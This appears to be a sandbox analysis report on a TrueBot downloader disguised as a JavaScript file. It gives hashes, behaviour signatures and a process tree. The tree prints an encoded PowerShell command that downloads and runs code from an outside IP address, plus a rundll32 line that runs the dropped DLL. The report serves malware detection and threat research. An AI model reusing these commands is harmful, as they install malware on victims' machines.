Analysis
-
max time kernel
1588s -
max time network
1789s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
07-04-2023 16:06
Static task
static1
Behavioral task
behavioral1
Sample
information_7_apr-4753978.js
Resource
win10-20230220-en
General
-
Target
information_7_apr-4753978.js
-
Size
67KB
-
MD5
71e7a2549311647a6178b84393700bf8
-
SHA1
5d605717cc5ff74f0b993274790ec343fe2c2687
-
SHA256
8a2aa35f1e8e8186a0f4a6684d3cab54e093914b2dba38f59d5d01c6ee6aaf04
-
SHA512
1ec12ae9f544de092e14daf118be87d64498bd0c3590281f1e44bc98809f89c0a4b60c172fd9ad19503a8cd466f0361f5336d140a25ea21f5747142745ccbd4a
-
SSDEEP
1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMd:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqZ
Malware Config
Extracted
http://62.204.41.69/dll.png
Signatures
-
TrueBot payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot -
TrueBot, Silence.Downloader
A downloader attributed to Silence group first seen in 2017.
-
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exerundll32.exeflow pid process 1 3132 powershell.exe 5 1076 rundll32.exe 13 1076 rundll32.exe 15 1076 rundll32.exe 27 1076 rundll32.exe 29 1076 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1076 rundll32.exe -
Drops file in Windows directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\Tasks\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exerundll32.exepid process 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 1076 rundll32.exe 1076 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exerundll32.exedescription pid process Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 1076 rundll32.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
wscript.execmd.exepowershell.execmd.exedescription pid process target process PID 2524 wrote to memory of 2640 2524 wscript.exe cmd.exe PID 2524 wrote to memory of 2640 2524 wscript.exe cmd.exe PID 2640 wrote to memory of 3132 2640 cmd.exe powershell.exe PID 2640 wrote to memory of 3132 2640 cmd.exe powershell.exe PID 3132 wrote to memory of 4744 3132 powershell.exe cmd.exe PID 3132 wrote to memory of 4744 3132 powershell.exe cmd.exe PID 4744 wrote to memory of 1076 4744 cmd.exe rundll32.exe PID 4744 wrote to memory of 1076 4744 cmd.exe rundll32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\information_7_apr-4753978.js1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll,ChkdskExs4⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll,ChkdskExs5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49